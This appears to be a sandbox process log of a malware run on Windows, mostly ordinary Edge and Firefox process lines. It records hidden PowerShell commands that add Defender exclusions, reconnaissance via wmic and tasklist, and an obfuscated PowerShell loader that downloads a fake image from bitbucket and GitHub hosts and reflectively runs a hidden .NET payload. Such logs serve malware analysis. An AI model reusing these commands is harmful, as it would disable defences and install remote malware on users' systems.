"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0I4Mzk0NDEtOUMyMi00MzgxLTkzRDItNjBDQTAyMEQ1NTU4fSIgdXNlcmlkPSJ7MzJBMjZDMUEtRjUyMC00QkVBLThCRDYtN0E2QTBFRkI4OERCfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QkI2RDU1NjItQkQ0RS00QzQzLUI0QUMtMjhDQjNCODAyRUQ5fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iMTI1IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTcyOTY5MzkyNSIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzc0MTY2NjMxMDk3MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE0OTQ4MDU2OTA4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\37f6ca98-43a7-4cdd-8808-3db1f69b3bcd_setup.zip.bcd\setup\Read it to me.txt
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\MicrosoftEdge_X64_130.0.2849.52.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=130.0.2849.52 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff7195fd730,0x7ff7195fd73c,0x7ff7195fd748
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 66 -isForBrowser -prefsHandle 8184 -prefMapHandle 11100 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e212b0e4-b63e-4275-91bd-4e51aa33d101} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9408 -childID 67 -isForBrowser -prefsHandle 10656 -prefMapHandle 10324 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5b14023-32af-4bd9-b261-39335767fc21} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0I4Mzk0NDEtOUMyMi00MzgxLTkzRDItNjBDQTAyMEQ1NTU4fSIgdXNlcmlkPSJ7MzJBMjZDMUEtRjUyMC00QkVBLThCRDYtN0E2QTBFRkI4OERCfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0MzQUZFMzFELTMzRUEtNDIxRi1BNDUyLTQzQkZBQTYxQzVFQ30iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSI4IiBwaHlzbWVtb3J5PSI4IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDQuNDUyOSIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjEyNSIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMwLjAuMjg0OS41MiIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQ5NTU2NjgxNzUiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDk1NTY5NzA1MSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1MTUyNzQ5NjUzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy85OTI5Y2ZmNC0zNDg3LTQ4MDUtOTNmNy04NmFjYjgxM2UyNmI_UDE9MTczMDY0MDM5MyZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1UMkc0U2s5bHQwZnVEaGdSYyUyZlVvbXk5MlBiOSUyZnI4SjBoclQ1YkxGSXpicWtUaXZsVlBxQXUyaiUyZnJHSjhMWTJGdkVxeU9OdVNWZnElMmI4OVZDYVZYRlFnJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTc0OTI1OTA0IiB0b3RhbD0iMTc0OTI1OTA0IiBkb3dubG9hZF90aW1lX21zPSIxMzA5OSIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1MTUyODg0MzU5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxNjcxMDQ2MzMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1NzgyMjE4NzU0IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMzQzIiBkb3dubG9hZF90aW1lX21zPSIxOTcxNyIgZG93bmxvYWRlZD0iMTc0OTI1OTA0IiB0b3RhbD0iMTc0OTI1OTA0IiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI2MTUwOCIvPjwvYXBwPjwvcmVxdWVzdD4
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=setup.exe --user-data-dir="C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-features=msSmartScreenProtection --mojo-named-platform-channel-pipe=6628.388.11174692730650125898
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=130.0.2849.52 --initial-client-data=0x138,0x118,0x13c,0x190,0x1b4,0x7ffead5d4dc0,0x7ffead5d4dcc,0x7ffead5d4dd8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView" --webview-exe-name=setup.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1812,i,1660234800736101472,14179520022252735590,262144 --disable-features=msSmartScreenProtection --variations-seed-version --mojo-platform-channel-handle=1808 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView" --webview-exe-name=setup.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2088,i,1660234800736101472,14179520022252735590,262144 --disable-features=msSmartScreenProtection --variations-seed-version --mojo-platform-channel-handle=2100 /prefetch:3
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView" --webview-exe-name=setup.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2236,i,1660234800736101472,14179520022252735590,262144 --disable-features=msSmartScreenProtection --variations-seed-version --mojo-platform-channel-handle=2360 /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView" --webview-exe-name=setup.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3716,i,1660234800736101472,14179520022252735590,262144 --disable-features=msSmartScreenProtection --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\";" powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\Temp\7867d0d6-c5c1-4617-8960-9ac539ff7f60_setup.zip.f60\setup\setup.exe\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\7867d0d6-c5c1-4617-8960-9ac539ff7f60_setup.zip.f60\setup\setup.exe
C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\671cd2b750753.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.pAipmbg/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\671cd2b750753.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
